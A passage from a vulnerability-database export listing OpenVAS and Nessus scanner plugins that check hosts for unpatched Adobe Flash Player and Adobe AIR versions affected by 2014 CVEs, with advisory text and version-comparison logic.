program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(850584);\n script_version(\"$Revision: 8044 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-08 09:32:49 +0100 (Fri, 08 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:21:18 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-0515\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Update for update openSUSE-SU-2014:0589-1 (update)\");\n\n tag_insight = \"\n This flash-player update fixes a critical buffer overflow\n vulnerability that leads to arbitrary code execution.\n\n The flash-player package was updated to version\n 11.2.202.356.\n * bnc#875577, APSB14-13, CVE-2014-0515\";\n\n tag_affected = \"update on openSUSE 11.4\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"openSUSE-SU\", value: 
\"2014:0589_1\");\n script_summary(\"Check for the Version of update\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"flash-player\", rpm:\"flash-player~11.2.202.356~107.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-gnome\", rpm:\"flash-player-gnome~11.2.202.356~107.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"flash-player-kde4\", rpm:\"flash-player-kde4~11.2.202.356~107.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-22T17:03:24", "description": "This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.", "cvss3": {}, "published": "2014-04-01T00:00:00", "type": "openvas", "title": "Adobe Flash Player Multiple Vulnerabilities - 01 Apr14 (Windows)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0510", "CVE-2014-0506"], "modified": "2020-04-20T00:00:00", "id": "OPENVAS:1361412562310804350", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804350", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_adobe_flash_mult_vuln01_apr14_win.nasl 2014-04-01 12:10:22Z Apr$\n#\n# Adobe Flash Player Multiple Vulnerabilities - 
01 Apr14 (Windows)\n#\n# Authors:\n# Shakeel <bshakeel@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:adobe:flash_player\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804350\");\n script_version(\"2020-04-20T13:31:49+0000\");\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0510\");\n script_bugtraq_id(66208, 66241);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-04-20 13:31:49 +0000 (Mon, 20 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2014-04-01 12:15:19 +0530 (Tue, 01 Apr 2014)\");\n script_name(\"Adobe Flash Player Multiple Vulnerabilities - 01 Apr14 (Windows)\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Adobe Flash Player and is prone to multiple\nvulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Flaws exist due to an use-after-free error and some other unspecified error.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will 
allow attacker to conduct denial of service or\npotentially execute arbitrary code.\");\n script_tag(name:\"affected\", value:\"Adobe Flash Player version 12.0.0.77 on Windows.\");\n script_tag(name:\"solution\", value:\"Upgrade Flash Player to version 13.0.0.182 or later.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://securitytracker.com/id?1029969\");\n script_xref(name:\"URL\", value:\"https://www.hkcert.org/my_url/en/alert/14033103\");\n script_xref(name:\"URL\", value:\"http://www.pwn2own.com/2014/03/pwn2own-results-for-wednesday-day-one\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_adobe_flash_player_detect_win.nasl\");\n script_mandatory_keys(\"AdobeFlashPlayer/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!playerVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_equal(version:playerVer, test_version:\"12.0.0.77\"))\n{\n report = report_fixed_ver(installed_version:playerVer, vulnerable_range:\"Equal to 12.0.0.77\");\n security_message(port:0, data:report);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-06-02T14:09:40", "description": "The remote host is affected by the vulnerability described in GLSA-201405-04 (Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n Impact :\n\n A remote attacker could entice a user to open a specially crafted SWF file using Adobe Flash Player, possibly resulting in execution of arbitrary code with the privileges of the process or a Denial of Service condition. 
Furthermore, a remote attacker may be able to bypass the Same Origin Policy or read the clipboard via unspecified vectors.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-05-05T00:00:00", "type": "nessus", "title": "GLSA-201405-04 : Adobe Flash Player: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0498", "CVE-2014-0499", "CVE-2014-0502", "CVE-2014-0503", "CVE-2014-0504", "CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509", "CVE-2014-0515"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:adobe-flash", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-201405-04.NASL", "href": "https://www.tenable.com/plugins/nessus/73860", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201405-04.\n#\n# The advisory text is Copyright (C) 2001-2016 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. 
See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73860);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-0498\", \"CVE-2014-0499\", \"CVE-2014-0502\", \"CVE-2014-0503\", \"CVE-2014-0504\", \"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\", \"CVE-2014-0515\");\n script_bugtraq_id(65702, 65703, 65704, 66122, 66127, 66208, 66699, 66701, 66703, 67092);\n script_xref(name:\"GLSA\", value:\"201405-04\");\n\n script_name(english:\"GLSA-201405-04 : Adobe Flash Player: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201405-04\n(Adobe Flash Player: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Adobe Flash Player.\n Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A remote attacker could entice a user to open a specially crafted SWF\n file using Adobe Flash Player, possibly resulting in execution of\n arbitrary code with the privileges of the process or a Denial of Service\n condition. 
Furthermore, a remote attacker may be able to bypass the Same\n Origin Policy or read the clipboard via unspecified vectors.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201405-04\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Adobe Flash Player users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-plugins/adobe-flash-11.2.202.356'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player Shader Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:adobe-flash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-plugins/adobe-flash\", unaffected:make_list(\"ge 11.2.202.356\"), vulnerable:make_list(\"lt 11.2.202.356\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Adobe Flash Player\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:13", "description": "According to its version, the instance of Adobe AIR on the remote Windows host is 4.0.0.1628 or earlier. It is, therefore, potentially affected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-site scripting attacks. 
(CVE-2014-0509)", "cvss3": {}, "published": "2014-04-09T00:00:00", "type": "nessus", "title": "Adobe AIR <= AIR 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:adobe:air"], "id": "ADOBE_AIR_APSB14-09.NASL", "href": "https://www.tenable.com/plugins/nessus/73432", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73432);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n\n script_name(english:\"Adobe AIR <= AIR 4.0.0.1628 Multiple Vulnerabilities (APSB14-09)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a version of Adobe AIR that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the instance of Adobe AIR on the remote\nWindows host is 4.0.0.1628 or earlier. It is, therefore, potentially\naffected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. 
(CVE-2014-0509)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/531839/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 13.0.0.83 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-0506\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"adobe_air_installed.nasl\");\n script_require_keys(\"SMB/Adobe_AIR/Version\", \"SMB/Adobe_AIR/Path\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nversion = get_kb_item_or_exit(\"SMB/Adobe_AIR/Version\");\npath = get_kb_item_or_exit(\"SMB/Adobe_AIR/Path\");\n\nversion_ui = get_kb_item(\"SMB/Adobe_AIR/Version_UI\");\nif (isnull(version_ui)) version_report = version;\nelse version_report = version_ui + ' (' + version + ')';\n\ncutoff_version = '4.0.0.1628';\nfix = '13.0.0.83';\nfix_ui = '13.0';\n\nif (ver_compare(ver:version, fix:cutoff_version) <= 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (!port) port = 445;\n\n # XSS\n set_kb_item(name:'www/'+port+'/XSS', value: TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version_report +\n '\\n Fixed version : ' + fix_ui + \" (\" + fix + ')\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version_report, path);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:32", "description": "An updated Adobe Flash Player package that fixes multiple security issues is now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having Critical security impact. 
Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe Flash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin APSB14-09, listed in the References section.\n\nTwo flaws were found in the way flash-plugin displayed certain SWF content. An attacker could use these flaws to create a specially crafted SWF file that would cause flash-plugin to crash or, potentially, execute arbitrary code when the victim loaded a page containing the malicious SWF content. (CVE-2014-0506, CVE-2014-0507)\n\nA flaw in flash-plugin could allow an attacker to obtain sensitive information if a victim were tricked into visiting a specially crafted web page. (CVE-2014-0508)\n\nA flaw in flash-plugin could allow an attacker to conduct cross-site scripting (XSS) attacks if a victim were tricked into visiting a specially crafted web page. 
(CVE-2014-0509)\n\nAll users of Adobe Flash Player should install this updated package, which upgrades Flash Player to version 11.2.202.350.", "cvss3": {}, "published": "2014-04-10T00:00:00", "type": "nessus", "title": "RHEL 5 / 6 : flash-plugin (RHSA-2014:0380)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:flash-plugin", "cpe:/o:redhat:enterprise_linux:5", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:6.5"], "id": "REDHAT-RHSA-2014-0380.NASL", "href": "https://www.tenable.com/plugins/nessus/73451", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:0380. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(73451);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2014-0506\", \"CVE-2014-0507\", \"CVE-2014-0508\", \"CVE-2014-0509\");\n script_bugtraq_id(66208, 66699, 66701, 66703);\n script_xref(name:\"RHSA\", value:\"2014:0380\");\n\n script_name(english:\"RHEL 5 / 6 : flash-plugin (RHSA-2014:0380)\");\n script_summary(english:\"Checks the rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An updated Adobe Flash Player package that fixes multiple security\nissues is now available for Red Hat Enterprise Linux 5 and 6\nSupplementary.\n\nThe Red Hat Security Response Team has rated this update as having\nCritical security impact. 
Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe flash-plugin package contains a Mozilla Firefox compatible Adobe\nFlash Player web browser plug-in.\n\nThis update fixes multiple vulnerabilities in Adobe Flash Player.\nThese vulnerabilities are detailed in the Adobe Security Bulletin\nAPSB14-09, listed in the References section.\n\nTwo flaws were found in the way flash-plugin displayed certain SWF\ncontent. An attacker could use these flaws to create a specially\ncrafted SWF file that would cause flash-plugin to crash or,\npotentially, execute arbitrary code when the victim loaded a page\ncontaining the malicious SWF content. (CVE-2014-0506, CVE-2014-0507)\n\nA flaw in flash-plugin could allow an attacker to obtain sensitive\ninformation if a victim were tricked into visiting a specially crafted\nweb page. (CVE-2014-0508)\n\nA flaw in flash-plugin could allow an attacker to conduct cross-site\nscripting (XSS) attacks if a victim were tricked into visiting a\nspecially crafted web page. 
(CVE-2014-0509)\n\nAll users of Adobe Flash Player should install this updated package,\nwhich upgrades Flash Player to version 11.2.202.350.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://helpx.adobe.com/security/products/flash-player/apsb14-09.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2014:0380\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0507\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0506\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0509\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2014-0508\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected flash-plugin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:flash-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/03/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/04/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/04/10\");\n 
script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:0380\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", reference:\"flash-plugin-11.2.202.350-1.el5\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", reference:\"flash-plugin-11.2.202.350-1.el6\")) flag++;\n\n\n if (flag)\n {\n flash_plugin_caveat = '\\n' +\n 'NOTE: This vulnerability check only applies to RedHat released\\n' +\n 'versions of the flash-plugin package. 
This check does not apply to\\n' +\n 'Adobe released versions of the flash-plugin package, which are\\n' +\n 'versioned similarly and cause collisions in detection.\\n\\n' +\n\n 'If you are certain you are running the Adobe released package of\\n' +\n 'flash-plugin and are running a version of it equal or higher to the\\n' +\n 'RedHat version listed above then you can consider this a false\\n' +\n 'positive.\\n';\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat() + flash_plugin_caveat\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"flash-plugin\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:19:31", "description": "The remote host is missing KB2942844. It is, therefore, affected by the following vulnerabilities :\n\n - A use-after-free error exists that could lead to arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-site scripting attacks. 
(CVE-2014-0509)", "cvss3": {}, "published": "2014-04-08T00:00:00", "type": "nessus", "title": "MS KB2942844: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0506", "CVE-2014-0507", "CVE-2014-0508", "CVE-2014-0509"], "modified": "2019-11-26T00:00:00", "cpe": ["cpe:/o:microsoft:windows", "cpe:/a:adobe:flash_player"], "id": "SMB_KB2942844.NASL", "href": "https://www.tenable.com/plugins/nessus/73418", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(73418);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\n \"CVE-2014-0506\",\n \"CVE-2014-0507\",\n \"CVE-2014-0508\",\n \"CVE-2014-0509\"\n );\n script_bugtraq_id(\n 66208,\n 66699,\n 66701,\n 66703\n );\n script_xref(name:\"MSKB\", value:\"2942844\");\n\n script_name(english:\"MS KB2942844: Update for Vulnerabilities in Adobe Flash Player in Internet Explorer\");\n script_summary(english:\"Checks version of ActiveX control\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an ActiveX control installed that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is missing KB2942844. It is, therefore, affected by\nthe following vulnerabilities :\n\n - A use-after-free error exists that could lead to\n arbitrary code execution. (CVE-2014-0506)\n\n - A buffer overflow error exists that could lead to\n arbitrary code execution. (CVE-2014-0507)\n\n - An unspecified error exists that could allow a security\n bypass leading to information disclosure.\n (CVE-2014-0508)\n\n - An unspecified error exists that could allow cross-\n site scripting attacks. 
